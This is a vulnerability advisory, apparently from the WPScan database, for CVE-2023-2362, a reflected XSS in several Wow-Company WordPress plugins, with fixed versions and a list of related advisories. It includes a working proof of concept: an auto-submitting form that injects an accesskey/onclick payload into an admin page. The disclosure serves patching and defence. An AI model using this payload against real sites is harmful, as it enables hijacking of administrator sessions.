Multiple Plugins from Wow-Company – Reflected XSS | CVE 2023-2362 | Plugin Vulnerabilities

Description

The plugins do not escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open a page with the code below

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=float-menu" method="POST">
      <input type="hidden" name="page" value='"accesskey=X onclick=alert(/XSS/)//>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The XSS will be triggered when pressing ALT+SHIFT+X on Windows and CTRL+ALT+X on OS X

Affects Plugins

Fixed in 5.0.2

Fixed in 3.0.4

button-generation

Fixed in 2.3.5

calculator-builder

Fixed in 1.5.1

Fixed in 1.2.2

floating-button

Fixed in 5.3.1

mwp-herd-effect

Fixed in 5.2.2

Fixed in 2.2.2

Fixed in 4.0.2

Fixed in 3.1.1

Fixed in 4.0.2

Fixed in 2.5.6

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Verified

Yes

WPVDB ID

27e70507-fd68-4915-88cf-0b96ed55208e

Timeline

Publicly Published

2023-05-22 (about 11 months ago)

Added

2023-05-22 (about 11 months ago)

Last Updated

2023-05-22 (about 11 months ago)

Other

Published

Title

Published

2014-08-01

Title

Recommend a friend 2.0.2 - inc/raf_form.php current_url Parameter Reflected XSS

Published

2021-10-25

Title

Video Lessons Manager - Admin+ Stored Cross-Site Scripting

Published

2024-03-29

Title

Gutenberg Block Editor Toolkit – EditorsKit < 1.40.5 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2023-04-24

Title

Rating Widget < 3.2.1 - Contributor+ Stored XSS

Published

2014-08-01

Title

Code Styling Localization < 1.99.20 - Cross Site Scripting